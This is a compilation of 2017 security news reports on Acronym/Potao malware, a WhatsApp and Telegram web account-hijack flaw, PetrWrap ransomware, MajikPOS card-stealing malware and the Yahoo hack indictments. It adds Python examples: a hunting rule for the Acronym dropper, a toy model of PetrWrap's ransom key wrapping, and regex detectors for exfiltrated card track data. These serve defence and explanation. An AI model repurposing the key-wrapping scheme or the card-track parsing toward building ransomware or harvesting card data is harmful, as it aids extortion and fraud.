In its report on Operation Potao Express, ESET said the malware was most probably of Russian origin and it had been used in attacks aimed at entities in Ukraine, Russia, Georgia and Belarus, including what experts described as “high-value targets.”

The new malware that Arbor Networks believes may be linked to Potao has been dubbed “Acronym” based on a debugging string and the URLs pointing to command and control (C&C) servers. Acronym and its dropper appear to have been compiled in mid-February.

The dropper is designed to kill the wmpnetwk.exe Windows process and replace the legitimate wmpnetwk.exe file with the malware.

Once executed, Acronym uses the Registry or the Task Scheduler to ensure that it’s persistent. It then contacts a C&C server and sends it information about the infected machine.
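A detection engineer can turn the dropper's behaviour into a hunting rule. The following Python is an added example (not Arbor's code) that correlates Sysmon-style telemetry: termination of wmpnetwk.exe, an overwrite of its file by a process outside a small servicing allowlist, and a Run key or scheduled task that then points at the replaced binary. The event format, the allowlist and the sample events are constructed for the example.

```python
"""Hunt for the Acronym dropper pattern in Sysmon-style telemetry.

Sequence: (1) wmpnetwk.exe is terminated, (2) a non-servicing process
writes C:\\Program Files\\Windows Media Player\\wmpnetwk.exe,
(3) a Run value or scheduled task then points at that path.
Event ids follow Sysmon: 1 ProcessCreate, 5 ProcessTerminate,
11 FileCreate, 13 RegistryValueSet.
"""
import json
from collections import deque

TARGET = r"c:\program files\windows media player\wmpnetwk.exe"
# Processes allowed to rewrite files under Program Files (hypothetical allowlist).
TRUSTED_WRITERS = {r"c:\windows\servicing\trustedinstaller.exe"}
WINDOW = 60   # seconds: a kill this close before the overwrite is part of the same act


def detect(lines):
    """Consume JSON event lines in time order; return one finding per suspicious overwrite."""
    kills = deque()
    findings = []
    for line in lines:
        ev = json.loads(line)
        image = ev.get("image", "").lower()
        if ev["id"] == 5 and image == TARGET:
            kills.append(ev["t"])
        elif ev["id"] == 11 and ev.get("target", "").lower() == TARGET:
            if image in TRUSTED_WRITERS:
                continue                                   # servicing stack: expected
            findings.append({"t": ev["t"], "writer": ev["image"],
                             "killed_first": any(ev["t"] - k <= WINDOW for k in kills),
                             "persistence": None})
        elif ev["id"] == 13 and findings and TARGET in ev.get("details", "").lower():
            findings[-1]["persistence"] = "registry"
        elif (ev["id"] == 1 and findings and image.endswith("schtasks.exe")
              and TARGET in ev.get("cmdline", "").lower()):
            findings[-1]["persistence"] = "task"
    return findings


# Constructed sample log: a download drops the implant, then the servicing
# stack legitimately touches the same file hours later.
WMP = r"C:\Program Files\Windows Media Player\wmpnetwk.exe"
SAMPLE_LOG = [json.dumps(e) for e in [
    {"t": 100, "id": 1, "image": r"C:\Users\ann\Downloads\invoice.exe", "cmdline": "invoice.exe"},
    {"t": 101, "id": 5, "image": WMP},
    {"t": 102, "id": 11, "image": r"C:\Users\ann\Downloads\invoice.exe", "target": WMP},
    {"t": 103, "id": 13, "image": WMP,
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\wmp",
     "details": WMP},
    {"t": 9000, "id": 11, "image": r"C:\Windows\servicing\TrustedInstaller.exe", "target": WMP},
]]

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

The overwrite alone is the strong signal; the preceding kill and the following persistence entry are there to raise confidence, so a finding with killed_first set and a persistence value is worth paging on, while one without either may be a software deployment worth a look.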

Similar to Potao, Acronym is a modular malware. Its built-in commands allow attackers to capture screenshots, download and execute other files, and run plugins. Since the C&C servers were offline at the time of Arbor’s analysis, researchers have not been able to identify any of the plugins.

However, similarities in the plugin functionality have led experts to believe that Acronym may be connected to Potao. Other similarities include the use of the same C&C infrastructure, attempts to contact C&C domains on the same ports, and the use of temporary file names that start with “HH.”

On the other hand, there are several differences when it comes to encryption and how the malware is delivered – unlike Potao, Acronym’s dropper does not use decoy documents, DLL files or process injections. Furthermore, some parts of the Acronym code, including for HTTP communications, encryption and the screenshot functionality, appear to have been copied from publicly available examples.

“As usual with new malware it is too soon to assess how active and widespread this new family will become, but it does have a potential link to a long running malware campaign known as Operation Potao Express that makes it worth watching,” said Arbor Networks’ Dennis Schwarz.


WhatsApp, Telegram Patch Account Hijacking Vulnerability

15.3.2017 securityweek Vulnerebility
A vulnerability found in the web versions of WhatsApp and Telegram could have been exploited to hijack accounts by sending the targeted user a malicious HTML file disguised as an image or a video.

The flaw was discovered by researchers at Check Point earlier this month and it was quickly patched by both Telegram and WhatsApp on the server side.

According to the researchers, an attacker could have used the vulnerability to take complete control of a user's account, including personal and group conversations, photos, videos and the contact list. The attacker could not only have stolen information but also interacted with the victim's contacts (for instance to send spam or to hijack their accounts using the same method).

Telegram and WhatsApp allow users to send various types of files to their contacts, including documents, audio files, videos and images. Users are normally blocked from sending unauthorized file types, but researchers have found a way to bypass restrictions and upload a malicious HTML file by manipulating its MIME type and making it appear as an authorized file.

Once the user opens the fake image or the fake video in a new browser tab, local storage data associated with the instant messaging applications is sent to the attacker, allowing them to take control of the account.

“In order to do that, the attacker creates a JavaScript function that will check every 2 seconds if there is new data in the backend, and replace local storage with the victim’s local storage,” researchers explained.

In the case of WhatsApp, the victim is normally alerted if there is more than one active session. However, the attacker’s malicious code could have caused the victim’s browser window to get stuck. The hacker could have maintained access to the victim’s account until they logged out – simply closing the browser did not lock the attacker out.

Telegram allows multiple active sessions, which means the victim is not alerted if an unauthorized user logs in to their account at the same time.


Petya-Based PetrWrap Ransomware Emerges

15.3.2017 securityweek Virus
A newly observed ransomware family is leveraging the well-known Petya ransomware to encrypt user data, but modifies the malware “on the fly” to control its execution, Kaspersky Lab researchers discovered.

Petya emerged in March last year, when it caught researchers’ attention because it could manipulate the Master Boot Record (MBR) to take over the machine, instead of encrypting users’ files, as other ransomware does. Soon, Petya teamed with another threat, the Mischa ransomware, and together they evolved into a Ransomware-as-a-Service (RaaS).

Dubbed PetrWrap (Trojan-Ransom.Win32.PetrWrap), the new ransomware uses Petya for its nefarious purposes, but isn’t based on the RaaS. The malware is being distributed manually: the actors behind it target an organization’s network, compromise it, then use the legitimate PsExec tool to install the ransomware on all endpoints and servers.

Written in C and compiled in Microsoft Visual Studio, the new malware packs a special module that allows it to use a sample of the Petya ransomware v3 to infect the target machines, but also to modify the code of Petya in runtime to control its execution. The threat also features its own cryptographic routines, Kaspersky’s Anton Ivanov and Fedor Sinitsyn explain.

After launch, PetrWrap delays its execution for one hour and a half, after which it decrypts the main DLL of Petya from its data section and prepares to call its exported function ZuWQdweafdsg345312. Petya uses this function to get ready for the next operations and to start the MBR overwrite process. Because it needs to hook a couple of Petya’s functions first, PetrWrap prevents the malware from proceeding on its own.

Next, the malware makes the necessary cryptographic computations, hooks two Petya procedures, and then passes the execution to Petya. PetrWrap completely replaces the ECDH part of Petya with an independent implementation, which allows it to use its own private and public keys. The ransomware comes with an embedded public key, generates a pair of session keys for each infection, computes ecdh_shared_digest, intercepts Petya’s salsa key and encrypts it using ecdh_shared_digest, constructs a user_id, and then passes the ID to Petya, which uses it as if it was its own data.

PetrWrap hooks two of Petya’s procedures and replaces them with its own procedures, which allows it to save the salsa key generated by Petya for further use; patch the Petya bootloader code and ransom text; pass execution to the original procedure; call the original procedure; generate the user_id; and replace Petya’s id string with this newly generated user_id.
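To see why the key handling above leaves the victim with nothing to decrypt with, here is an added Python model (not PetrWrap's or Petya's code; the elliptic-curve exchange is replaced by plain Diffie-Hellman over a toy prime and the real cipher by a single-use XOR pad, neither suitable for real use) of the exchange described: the binary embeds only the operator's public key, each infection generates a session key pair, the shared digest wraps the Salsa key, and the user_id shown to the victim carries the session public key and the wrapped key. Only the operator's private key recovers the Salsa key. Key sizes and the group are assumptions for the example.

```python
"""Model of the key handling PetrWrap bolts onto Petya.

The victim never holds anything that decrypts: a per-infection key pair
is combined with the operator's public key, the resulting shared digest
encrypts the Salsa key, and only the operator's private key can undo it.
Petya's elliptic-curve exchange is modelled with plain Diffie-Hellman
over a toy prime, and the real cipher with a single-use XOR pad.
"""
import hashlib
import secrets

P = (1 << 127) - 1      # Mersenne prime 2**127-1: toy group for demonstration only
G = 5


def keygen():
    """Return (private, public) in the toy group."""
    priv = secrets.randbelow(P - 3) + 2
    return priv, pow(G, priv, P)


def shared_digest(peer_public, private):
    """Role of ecdh_shared_digest: hash of the Diffie-Hellman shared secret."""
    shared = pow(peer_public, private, P)
    return hashlib.sha256(shared.to_bytes(16, "big")).digest()


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wrap_salsa_key(operator_public, salsa_key):
    """Victim side: produce the user_id the ransom note displays.

    salsa_key is the 32-byte disk-encryption key Petya generated.
    """
    session_private, session_public = keygen()          # fresh per infection
    digest = shared_digest(operator_public, session_private)
    wrapped = xor(salsa_key, digest)                     # 32-byte key under a 32-byte digest
    del session_private                                  # never written to disk
    return session_public.to_bytes(16, "big").hex() + wrapped.hex()


def unwrap_salsa_key(operator_private, user_id):
    """Operator side: recover the Salsa key from the user_id a victim sends."""
    raw = bytes.fromhex(user_id)
    session_public = int.from_bytes(raw[:16], "big")
    return xor(raw[16:], shared_digest(session_public, operator_private))


if __name__ == "__main__":
    operator_private, operator_public = keygen()       # the binary embeds only the public half
    salsa_key = secrets.token_bytes(32)
    user_id = wrap_salsa_key(operator_public, salsa_key)
    print("user_id:", user_id)
    print("operator recovers key:", unwrap_salsa_key(operator_private, user_id) == salsa_key)
    print("anyone else:", unwrap_salsa_key(keygen()[0], user_id) == salsa_key)
```

What the disk holds after infection is the operator public key, the session public key and the wrapped Salsa key; with the session private key discarded, recovering the Salsa key is a Diffie-Hellman problem against the operator's key. That is why swapping in their own key pair was enough for the PetrWrap authors to cut Petya's original operators out, and why no free decryptor exists.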

All these changes allow PetrWrap to lock the victim’s machine, securely encrypt the MFT of NTFS partitions, and show a lockscreen that has no mention of Petya (it also lacks the flashing skull animation). Moreover, the approach allows the PetrWrap developers to encrypt the bootloader without having to write their own code.

Because this family of ransomware uses a strong encryption algorithm, there’s no free decryption tool available to help victims. According to Kaspersky, however, victims can try restoring their files using third-party tools such as R-Studio.

“Targeted attacks on organizations with the main aim of encrypting data are becoming more popular. The groups using ransomware in their targeted attacks usually try to find vulnerable servers or servers with unprotected RDP access. After penetrating an organization’s network they use special frameworks like Mimikatz to obtain the necessary credentials for installing ransomware throughout the network,” Kaspersky concludes.


New MajikPOS Malware Targets North American Businesses

15.3.2017 securityweek Virus
A newly discovered point-of-sale (PoS) malware featuring a modular approach in execution is currently targeting businesses in North America, Trend Micro researchers warn.

Dubbed MajikPOS, the malware is capable of stealing information from the compromised systems, just as other PoS threats do, but its modular approach sets it apart. MajikPOS’s initial attacks reportedly started at the end of January 2017.

Named after its command and control (C&C) panel, the malware “needs only another component from the server to conduct its RAM scraping routine,” Trend Micro says. The security researchers also reveal that MajikPOS’s operators use a combination of PoS malware and remote access Trojan (RAT) to attack their targets.

The actors illicitly gain access to the victims’ endpoints using Virtual Network Computing (VNC) and Remote Desktop Protocol (RDP), along with easy-to-guess username and password combinations. Command-line FTP (File Transfer Protocol) and, in some cases, a modified version of Ammyy Admin (named VNC_Server.exe or Remote.exe, with only its file manager capability used) were also abused to install MajikPOS. The tools used in these attacks were usually downloaded from free file-hosting sites.

First, the attackers fingerprint their targets, after which they attempt to gain access using generic credentials or via brute force. In some cases, they used RATs previously installed on the system. Common to these attacks was the fact that the RATs were installed on the victims’ machines between August and November 2016.

MajikPOS was written using the .NET framework, uses encrypted communication to avoid detection, and leverages open RDP ports for intrusion, the same as other related threats, such as Operation Black Atlas. In some instances, the malware’s operators used common lateral movement hacking tools, which suggests they attempted to gain further access to the victims’ networks.

After installation, the malware contacts its C&C server to register the infected system, and to receive a configuration file with three entries to be used in later steps. The C&C panel on the server is called Magic Panel, and the researchers discovered two of them.

MajikPOS’s RAM scraping component is called Conhost.exe and is responsible for finding credit card data on the victim’s machine. The malware seeks information on cards such as American Express, Diners Club, Discover, Maestro, Mastercard, and Visa. It verifies the credit card’s track data and then sends it to the C&C server via HTTP POST.
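The exfiltration step described above (verified card tracks leaving the host in an HTTP POST) is something a proxy or DLP sensor on the PoS network segment can alert on. The following is an added example, not Trend Micro’s or the malware’s code: it scans constructed POST bodies for Track 1 and Track 2 formatted data, keeps only Luhn-valid PANs, labels the brand with simplified issuer ranges, and masks the PAN in the alert.

```python
import re

# Constructed sample POST bodies (not captured traffic); the card numbers are
# public test numbers. Body 0 carries Track 1 and Track 2 for one card, body 2
# Track 2 only, body 3 a Track 2 string whose PAN fails the Luhn check.
SAMPLE_POST_BODIES = [
    "id=WS01&data=%B4111111111111111^DOE/JOHN^25121011234500000000?"
    ";4111111111111111=25121011234500000000?",
    "id=WS01&data=hello+world",
    "id=WS02&data=;5500000000000004=24061011234567890?",
    "id=WS03&data=;1234567812345678=24061010000000000?",
]

# Track 1 looks like %B<PAN>^<NAME>^<YYMM...>, Track 2 like ;<PAN>=<YYMM...>
TRACK1_RE = re.compile(r"%B(\d{13,19})\^([^^]{2,26})\^(\d{4})")
TRACK2_RE = re.compile(r";(\d{13,19})=(\d{4})")

def luhn_ok(pan):
    # Mod-10 check: filters digit runs that merely look like a PAN
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch) * (2 if i % 2 else 1)
        total += d - 9 if d > 9 else d
    return total % 10 == 0

def brand(pan):
    # Coarse issuer lookup by leading digits (simplified IIN ranges, an assumption)
    two = int(pan[:2])
    if pan[0] == "4":
        return "Visa"
    if two in (34, 37):
        return "American Express"
    if 51 <= two <= 55:
        return "Mastercard"
    if pan.startswith("6011") or two == 65:
        return "Discover"
    return "Maestro/other"

def scan_post_body(body):
    # One finding per distinct Luhn-valid PAN in track format; PAN is masked in the alert
    findings = {}
    for track, regex in (("track1", TRACK1_RE), ("track2", TRACK2_RE)):
        for m in regex.finditer(body):
            pan = m.group(1)
            if not luhn_ok(pan):
                continue
            masked = pan[:6] + "*" * (len(pan) - 10) + pan[-4:]
            f = findings.setdefault(pan, {"pan_masked": masked, "brand": brand(pan), "tracks": []})
            f["tracks"].append(track)
    return list(findings.values())

if __name__ == "__main__":
    for i, body in enumerate(SAMPLE_POST_BODIES):
        for f in scan_post_body(body):
            print("ALERT body[%d]: %s %s via %s" % (i, f["brand"], f["pan_masked"], "+".join(f["tracks"])))
```

The Luhn filter is what keeps ordinary numeric form fields from firing; a real deployment would run the same scan over decrypted egress or proxy logs rather than a fixed list.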

In addition to the Magic Panel servers, the researchers also managed to tie to the same registrant a series of websites used to sell stolen credit card information, as well as a couple of C&C panels for the malware. At the moment, the actor has around 23,400 stolen credit card tracks up for sale, priced between $9 and $39, depending on the type of card. Card data is available in bulk packages of 25, 50, and 100, priced at $250, $400, and $700, respectively.

Last month, a user called “MagicDumps” was advertising some of these websites on carding forums, and Trend Micro notes that the same person has also been updating the forums with new dumps sorted by location, mostly in the U.S. and Canada.

“In separate incidents, we saw a command-line tool abused to deploy MajikPOS, along with other PoS malware. MajikPOS is also notable with how it tries to hide by mimicking common file names in Microsoft Windows,” researchers say, adding that the threat “is a reflection of the increasing complexity that bad guys are predicted to employ in their malware to neuter traditional defenses.”

According to Trend Micro, properly configured chip-and-PIN credit cards with end-to-end encryption (Europay, MasterCard and Visa, or EMV) shouldn’t be affected by the threat, but terminals that don’t support them are at risk. The U.S. adopted EMV following the implementation of the EMV Liability Shift in October 2015, which resulted in an increase in online fraud in the country.

“While businesses and consumers across the country are increasingly deploying and using chip-based PoS terminals, many merchants, for instance, still haven’t implemented the PIN part of the chip-and-PIN process. Although the use of EMV Chip-and-PIN credit cards is not a silver bullet, EMVs are still a more secure alternative compared to magnetic stripe-based credit cards that are most affected by PoS malware like MajikPOS,” Trend Micro says.


U.S. Government Indicts Two Russian FSB Officers Over Yahoo Hack

15.3.2017 securityweek BigBrothers
U.S. Government Indicts Four Over 2014 Yahoo Hack, Including Two Russian FSB Officers

The US government today announced the indictment of four individuals charged with computer hacking, economic espionage and other offenses in connection with the 2014 breach of Yahoo that involved the theft of information on at least 500 million user accounts. Three of the accused are Russian nationals currently living in Russia. The fourth, Karim Baratov, is a Canadian and Kazakh national who was arrested in Canada on Tuesday.

Two of the Russian nationals, Dmitry Aleksandrovich Dokuchaev and Igor Anatolyevich Sushchin, are serving officers of the Russian Federal Security Service (FSB). In announcing the indictments, Acting Assistant Attorney General Mary McCord of the National Security Division made it clear that the US believes they were acting in their capacity as FSB officers.

The third Russian national is Alexsey Alexseyevich Belan. This is not the first time he has been indicted by the US. He was indicted on different charges in 2012 and 2013, and is on the FBI's 'Cyber Most Wanted' List. He is currently the subject of an Interpol Red Notice. He was arrested in a European country in June 2013, but managed to escape to Russia before he could be extradited to the US.

The belief is that the FSB officers employed cyber criminals (Belan and Baratov) to do the hacking. The US government suspects that the FSB's primary objective was espionage. Targets included the private accounts of Russian journalists; Russian and U.S. government officials; and employees of a prominent Russian cybersecurity company. The two non-FSB cyber criminals then used the stolen data for more traditional criminal activities.

"We've known for some time that spies have targeted email accounts as a primary vector to collect information," comments Eric O'Neill, a former FBI counter-terrorism operative who helped capture Russian spy Robert Hanssen -- and now national security strategist with Carbon Black. "Global communications, both personal and business, often rely on email as the first method of communication. This creates a detailed record that can be used for a variety of purposes. Infiltration into email accounts allows spies to collect credentials that provide access to targeted systems. Monitoring government agency systems informs policy decisions, collects information on defense and attack capability, and can provide an economic boost to foreign nations."

Belan also obtained access to Yahoo's Account Management Tool. Used in conjunction with the stolen account database, he and the FSB officers were able to locate Yahoo email accounts of interest and manually create cookies to allow unauthorized access to at least 6,500 accounts.

In a separate statement today, Yahoo commented, "the U.S. Department of Justice announced the indictment of four defendants, two Russian intelligence officers and two state-sponsored hackers, for the theft of Yahoo user data in late 2014, as well as cookie forging to obtain access to user accounts on our network in 2015 and 2016." Yahoo has always maintained its original position that the hack had been state-sponsored, and it is now vindicated.

"We appreciate the FBI's diligent investigative work and the DOJ’s decisive action to bring to justice those responsible for the crimes against Yahoo and its users." For its part, the government acknowledged the help of both Yahoo and Google in its investigations, and also acknowledged help from the Canadian authorities and the UK's MI5.

The US hopes, and (officially) expects, the three Russians to be turned over to the US for trial. "We would hope they would respect our criminal justice system, and respect these charges, and what they need to do," said McCord.

The reality is there is no extradition treaty with Russia, and this is unlikely to happen. Russia has already ignored two requests on Belan, and a third is expected to be issued tomorrow.

"Instead of detaining him [Belan, under the Red Notice] the FSB officers used him to break into Yahoo's networks. Meanwhile, Belan used his relationship with the two FSB officers and his access to Yahoo to commit additional crimes to line his pockets with money," said McCord.

Belan used his access to steal financial information such as gift card and credit card numbers from webmail accounts; to gain access to more than 30 million accounts whose contacts were then stolen to facilitate a spam campaign; and to earn commissions from fraudulently redirecting a subset of Yahoo’s search engine traffic.

The indictment of two Russian security officers will undoubtedly put further pressure on already strained US/Russian relations.

Asked if it would be possible to maintain a good working relationship with the FSB following these indictments, McCord replied, "I think that is a challenge. It is something we will continue to look at. I think this case is going to be a great test of that."

"Any indictment of Russia by the US DOJ will likely be met with recrimination and denial," adds O'Neill. "Russia will likely use the same playbook that China used when we charged five Chinese military spies for cyber espionage against U.S. corporations and a labor organization in 2014... China vehemently denounced the indictment and stated that the US used 'fabricated facts' and that it 'grossly violates the basic norms governing international relations and jeopardizes China-U.S. cooperation'."

“These accounts contain a tremendous amount of personal information, including personally identifiable information, financial account passwords, workplace account passwords, information about investments and financial issues, or details around the workplace projects and business plans of CEOs, attorneys, and high net worth investors, as well as politicians, military officers, or other government officials,” Steve Grobman, Intel Security’s CTO, told SecurityWeek.

“The public disclosure of such material could be sensitive enough to destroy careers, enable blackmail, endanger a mission, or influence high-level negotiations and decisions. The weaponization of such information in the realm of economic espionage presents unlimited opportunities for monetization," Grobman added.


US Charges Two Russian Spies & Two Hackers For Hacking 500 Million Yahoo Accounts
15.3.2017 thehackernews BigBrothers

The 2014 Yahoo hack, disclosed late last year, which compromised over 500 million Yahoo user accounts, was believed to have been carried out by a state-sponsored hacking group.
Now, two Russian intelligence officers and two criminal hackers have been charged by the US government in connection with the 2014 Yahoo hack that compromised about 500 million Yahoo user accounts, the Department of Justice announced Wednesday.
According to the prosecutors, at least 30 million accounts were accessed as part of a spam campaign to access the email contents of thousands of people, including journalists, government officials, and technology company employees.
The four defendants, two officers from the Russian Federal Security Service (FSB) and two other hackers, are identified as:
Dmitry Aleksandrovich Dokuchaev, 33, an officer in the FSB Center for Information Security at the time of the hack, and a Russian national and resident.
Igor Anatolyevich Sushchin, 43, an FSB officer, a superior to Dokuchaev within the FSB, and a Russian national and resident.
Alexsey Alexseyevich Belan, aka "Magg," 29, a Russian national and resident, who has been on the FBI’s Most Wanted Hackers list and was indicted twice, in 2012 and 2013, by U.S. federal grand juries on hacking and fraud charges.
Karim Baratov, aka "Kay," "Karim Taloverov" and "Karim Akehmet Tokbergenov," 22, a Canadian and Kazakh national and a resident of Canada.
In a 38-page indictment [PDF] unsealed Wednesday, the prosecutors said the two Russian spies worked with the two other hackers to break into Yahoo and gain initial access in early 2014.
Belan, who is on the FBI's most-wanted cybercriminals list, used the file transfer protocol (FTP) to download the Yahoo database, which contained usernames, recovery e-mail accounts, phone numbers, and "certain information required to manually create, or 'mint,' account authentication web browser 'cookies' for more than 500 million Yahoo accounts."
The spies then used the stolen information to obtain unauthorized access to the contents of accounts at Yahoo, Google and other webmail providers, including those of Russian and American officials, Russian journalists, employees of financial services and other businesses.
The charges are officially listed as:
Conspiring to commit computer fraud and abuse
Conspiring to engage in the theft of trade secrets
Conspiring to engage in and committing economic espionage
Conspiring to commit wire fraud
Counterfeit access device fraud
Counterfeit access device making equipment
Aggravated identity theft
Transmitting code with the intent to cause damage to computers
Unauthorized access to a computer for obtaining information for commercial advantage and private financial gain
Baratov was arrested on Tuesday by the Toronto Police Department, while Belan and the two FSB officers are in Russia. The United States has requested that all three be handed over to face charges, but the US has no extradition treaty with Russia.
Meanwhile, Assistant Attorney General Mary McCord said that there was no connection between the Wednesday indictment and the investigation into the hacking of the Democratic National Committee (DNC) last year.
The news of the arrest came a few weeks after Yahoo and Verizon Communications Inc. agreed to reduce the price of the upcoming acquisition deal by $350 million in the wake of the two data breaches.
The deal, which was previously finalized at $4.8 billion, is now valued at about $4.48 billion in cash and is expected to close in the second quarter.